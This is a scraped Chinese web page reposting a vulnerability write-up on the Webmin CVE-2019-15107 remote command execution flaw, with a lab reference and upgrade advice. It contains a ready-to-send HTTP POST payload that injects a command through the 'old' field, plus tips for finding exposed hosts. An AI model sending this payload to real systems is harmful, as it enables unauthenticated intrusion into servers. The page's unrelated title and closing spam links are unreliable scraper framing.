当前位置: 首页 > news >正文

买表的网站营销心得体会感悟300字

news 2025/7/26 8:40:14
买表的网站,营销心得体会感悟300字,开发微信小程序商城,wordpress自动sitemap漏洞编号 CVE-2019-15107 漏洞描述 Webmin是一个基于Web的系统配置工具&#xff0c;用于类Unix系统。密码重置页面中存在此漏洞&#xff0c;允许未经身份验证的用户通过简单的 POST 请求执行任意命令。 影响版本 Webmin<1.920 漏洞评级 严重 利用方法&#xff08;利…

漏洞编号

CVE-2019-15107

漏洞描述

Webmin是一个基于Web的系统配置工具,用于类Unix系统。密码重置页面中存在此漏洞,允许未经身份验证的用户通过简单的 POST 请求执行任意命令。

影响版本

Webmin<=1.920

漏洞评级

严重

利用方法(利用案例)

参考链接:https://vulhub.org/#/environments/webmin/CVE-2019-15107/

构造payload

POST /password_change.cgi HTTP/1.1
Host: your-ip:10000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: redirect=1; testing=1; sid=x; sessiontest=1
Referer: https://your-ip:10000/session_login.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 60

user=rootxx&pam=&expired=2&old=test|id&new1=test2&new2=test2

直接利用payload即可 

漏洞挖掘

可以根据网站指纹信息

10000是这个系统的默认端口,在目标网站访问这个url:/password_change.cgi

加固建议

升级到1.930版本

漏洞分类

远程代码执行漏洞

参考链接

Vulhub - 用于漏洞环境的 Docker-Compose 文件

 

http://www.ds6.com.cn/news/20454.html

相关文章:

  • 大型门户网站设计公司河南seo推广
  • 自己做静态网站的步骤济南网站建设公司
  • 可以做单的猎头网站深圳网站建设系统
  • 宁波seo网站服务免费服务器
  • 邢台网站制作地址现在做网络推广都有什么方式
  • 网站开发建设合同上海百度竞价点击软件
  • 潍坊网站建设熊掌号免费顶级域名申请网站
  • dw可以用来做网站吗独立站搭建要多少钱
  • 哪个公司做网站最好深圳网站优化是做什么的
  • 个人网站推荐汕头seo推广
  • 网站目录链接怎么做的石家庄疫情太严重了
  • 做网站时会留下ip地址吗可以免费领取会员的软件
  • 网站文章页的排名怎么做视频网站推广
  • 浙江华企做的网站效果如何惠州seo建站
  • wps文字可以做网站吗seo黑帽是什么
  • ps做特效哪个网站好百度seo外包
  • 前端做网站一般用什么框架上海优化外包公司排名
  • 阿里云服务器可以做彩票网站吗seo优化顾问服务阿亮
  • wordpress首页广告济南seo优化公司助力排名
  • 南通企业网站seo2023网络营销成功案例
  • wordpress 文章和tag网络优化是做什么的
  • 临淄信息港发布信息厦门seo搜索引擎优化
  • 做pc端网站公司佛山关键词排名工具
  • 网站建设的er图怎么画台湾搜索引擎
  • 桂林做网站的公司常州seo第一人
  • 做特价的网站网络推广网站排行榜
  • 华为云云速建站怎样找培训班一般在什么平台
  • 蛋糕行业网站建设方案最近最新的新闻
  • 全国监理工程师查询网谷歌优化培训
  • vps搭建网站是什么意思网站优化及推广